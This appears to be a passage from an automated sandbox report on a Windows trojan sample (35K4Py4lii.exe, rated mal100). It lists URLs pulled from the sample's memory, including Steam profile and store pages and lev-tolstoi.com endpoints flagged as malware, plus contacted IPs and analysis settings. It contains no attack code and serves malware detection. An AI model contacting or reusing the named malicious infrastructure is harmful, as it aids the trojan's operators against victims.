                                                        https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbY35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015F4000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://store.steampowered.com/subscriber_agreement/35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.valvesoftware.com/legal.htm35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.youtube.com35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.google.com35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af635K4Py4lii.exe, 00000000.00000003.1376602406.000000000157C000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://lev-tolstoi.com/j35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=135K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://steambroadcast-test.akamaized35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://community.fastly.steamstatic.com/35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://lev-tolstoi.com/d35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://lev-tolstoi.com/35K4Py4lii.exe, 00000000.00000002.1378297153.000000000159A000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376764955.0000000001599000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376602406.0000000001597000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://store.steampowered.com/privacy_agreement/35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://store.steampowered.com/points/shop/35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&a35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://sketchfab.com35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://lv.queniujq.cn35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://steamcommunity.com/profiles/76561199724331900/inventory/35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://store.steampowered.com/privacy_agreement/35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=eng35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://community.fastly.steamstatic.com/public/shared35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://community.fastly.steamstatic.com/public/css/globalv2.35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&am35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.google.com/recaptcha/35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://checkout.steampowered.com/35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://help.st35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://store.steampowered.com/about/35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://steamcommunity.com/my/wishlist/35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://lev-tolstoi.com/90035K4Py4lii.exe, 00000000.00000002.1378240748.0000000001582000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376602406.0000000001582000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              		unknown
                                                                                                                              https://checkout.steampow35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://help.steampowered.com/en/35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://steamcommunity.com/market/35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://store.steampowered.com/news/35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/button35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://store.steampowered.com/subscriber_agreement/35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://recaptcha.net/recaptcha/;35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://login.steamp35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://steamcommunity.com/discussions/35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://store.steampowered.com/stats/35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://medal.tv35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&a35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://store.steampowered.com/steam_refunds/35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://steamcommunity.com/login/home/?goto=profiles%2F7656119972433190035K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=96201635K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=e35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://steamcommunity.com/workshop/35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://login.steampowered.com/35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_c35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://store.steampowered.com/legal/35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=en35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=eng35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&a35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=engl35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://lev-tolstoi.com/api/35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://store.steampowered.com/35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&amp;l=e35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclD35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://127.0.0.1:2706035K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif35K4Py4lii.exe, 00000000.00000003.1376602406.000000000157C000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/I35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.135K4Py4lii.exe, 00000000.00000002.1378342246.00000000015F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://community.fastly.steam35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://help.steampowered.com/35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://api.steampowered.com/35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://store.steampowered.com/account/cookiepreferences/35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://store.steampowered.com/mobile35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://steamcommunity.com/35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn8135K4Py4lii.exe, 00000000.00000003.1376602406.000000000157C000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high

                                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                    104.21.66.86
                                                                                                                                                                                                                    		lev-tolstoi.comUnited States
                                                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                    23.55.153.106
                                                                                                                                                                                                                    		steamcommunity.comUnited States
                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                    General Information

                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                    Analysis ID:1580867
                                                                                                                                                                                                                    Start date and time:2024-12-26 12:36:11 +01:00
                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                    Overall analysis duration:0h 5m 17s
                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                    Number of analysed new started processes analysed:7
                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                    Sample name:35K4Py4lii.exe
                                                                                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                                                                                    Original Sample Name:7ba64e463f6ec058337a237846d00e01.exe
                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                    Classification:mal100.troj.evad.winEXE@1/0@11/2
                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                    HCA Information:Failed
                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                                                                                    Warnings

                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                    06:37:12API Interceptor6x Sleep call for process: 35K4Py4lii.exe modified

                                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                                    IPs

                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
